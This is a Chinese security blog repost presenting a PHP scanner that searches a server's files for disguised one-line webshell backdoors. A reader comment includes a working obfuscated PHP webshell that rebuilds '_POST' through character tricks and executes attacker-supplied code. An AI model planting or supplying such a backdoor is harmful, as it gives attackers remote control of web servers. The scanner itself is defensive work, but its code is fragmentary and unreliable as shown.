完美扫描PHP特殊一句话后门

admin
admin
admin
101113
文章
87
评论
2021年4月2日19:31:14评论30 views字数 0阅读0分0秒阅读模式
 -1 || strpos($name,'%00') > -1 || strpos($name,'/') > -1) {
            echo '特征  '.$path.'
'; flush(); ob_flush();
        } else {
            if(!preg_match($exs,$name)) continue;
            if(filesize($path) > 10000000) continue;
            $fp = fopen($path,'r');
            $code = fread($fp,filesize($path));
            fclose($fp);
            if(empty($code)) continue;
            foreach($matches as $matche) {
                $array = array();
                preg_match($matche,$code,$array);
                if(!$array) continue;
                if(strpos($array[0],"x24x74x68x69x73x2dx3e")) continue;
                $len = strlen($array[0]);
                if($len > 6 && $len  '.$path.'
';
                    flush(); ob_flush(); break;
                }
            }
            unset($code,$array);
        }
    }
    closedir($handle);
    return true;
}

function strdir($str) { return str_replace(array('\','//','//'),array('/','/','/'),chop($str)); }

echo '
';
echo '路径:

';
echo '后缀:

';
echo '操作:

';
echo '

';

if(file_exists($_POST['dir']) && $_POST['exs']) {
$dir = strdir($_POST['dir'].'/');
$exs = '/('.str_replace('.','\.',$_POST['exs']).')/i';
echo antivirus($dir,$exs,$matches) ? '

扫描完毕' : '

扫描中断';
}
?>

留言评论(旧系统):

梦半醒 @ 2013-11-01 10:26:41

$_="";
$_[+""]='';
$_="$_"."";
$_=($_[+""]|" ").($_[+""]|"").($_[+""]^" ");
?>
=${'_'.$_}['_'](${'_'.$_}['__']);?>

本站回复:

你这个变态,囧……

佚名 @ 2013-11-01 12:04:29

核总记不记得一个 Php、aspx、jsp 脚本嗅探工具的打包。 前几天用手机看到的,但是忘了是乌云还是你博客还是你博客的某个友情链接了。。 翻了俩小时都没找到。。。 求助攻

本站回复:

额,目测不是本站的,只知道有嗅探脚本,但没听说过这个打包的工具,爱莫能助……

佚名 @ 2013-11-01 12:05:51

核总记不记得一个 Php、aspx、jsp 脚本嗅探工具的打包。 前几天用手机看到的,但是忘了是乌云还是你博客还是你博客的某个友情链接了。。 翻了俩小时都没找到。。。 求助攻

本站回复:

额,目测不是本站的,只知道有嗅探脚本,但没听说过这个打包的工具,爱莫能助……

佚名 @ 2013-11-04 12:57:54

就是jsp、php、aspx格式的嗅探脚本。。

本站回复:

这个很多啊,百度一下,就有很多……

文章来源于lcx.cc:完美扫描PHP特殊一句话后门

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月2日19:31:14
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   完美扫描PHP特殊一句话后门https://cn-sec.com/archives/315995.html

发表评论

匿名网友 填写信息